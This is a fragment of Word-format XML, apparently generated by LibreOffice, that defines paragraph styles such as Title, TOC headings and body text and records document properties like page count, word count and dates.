      <w:spacing w:lineRule="auto" w:line="360" w:before="480" w:after="240"/>
      <w:jc w:val="lef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BodyText">
    <w:name w:val="Body Text"/>
    <w:pPr>
      <w:widowControl w:val="false"/>
      <w:pBdr/>
      <w:suppressAutoHyphens w:val="true"/>
      <w:bidi w:val="0"/>
      <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="120"/>
      <w:jc w:val="lef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Footer">
    <w:name w:val="Foot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Title">
    <w:name w:val="Title"/>
    <w:next w:val="BodyA"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
      </w:pBdr>
      <w:bidi w:val="0"/>
      <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="300"/>
      <w:jc w:val="lef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IndexHeading">
    <w:name w:val="Index Heading"/>
    <w:basedOn w:val="Ttulo"/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:next w:val="BodyA"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines/>
      <w:widowControl/>
      <w:pBdr/>
      <w:bidi w:val="0"/>
      <w:spacing w:lineRule="auto" w:line="360" w:before="480" w:after="240"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0F253F"/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:u w:val="none" w:color="0F253F"/>
      <w:lang w:val="en-US" w:eastAsia="en-ZA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="TOC 1"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:widowControl/>
      <w:pBdr/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
        <w:tab w:val="right" w:pos="9340" w:leader="dot"/>
      </w:tabs>
      <w:bidi w:val="0"/>
      <w:spacing w:lineRule="auto" w:line="288" w:before="0" w:after="100"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
      <w:color w:val="000000"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:u w:val="none" w:color="000000"/>
      <w:lang w:val="en-US" w:eastAsia="en-ZA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="TOC 2"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:widowControl/>
      <w:pBdr/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
        <w:tab w:val="right" w:pos="9340" w:leader="dot"/>
      </w:tabs>
      <w:bidi w:val="0"/>
      <w:spacing w:lineRule="auto" w:line="288" w:before="0" w:after="100"/>
      <w:ind w:left="220"/>
      <w:jc w:val="lef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pBdr/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="0" w:after="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:ascii="Times New Roman" w:hAnsi="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pBdr/>
      <w:bidi w:val="0"/>
      <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="200"/>
      <w:ind w:left="720"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
      <w:color w:val="000000"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:u w:val="none" w:color="000000"/>
      <w:lang w:val="en-US" w:eastAsia="en-Z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ode-crafters.com/abilityserver/"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LibreOffice/7.6.0.3$Windows_X86_64 LibreOffice_project/69edd8b8ebc41d00b4de3915dc82f8f0fc3b6265</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>14</Pages>
  <Words>1593</Words>
  <Characters>10227</Characters>
  <CharactersWithSpaces>11810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2021-05-11T11:31:00Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>es-ES</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-12T14:46:20Z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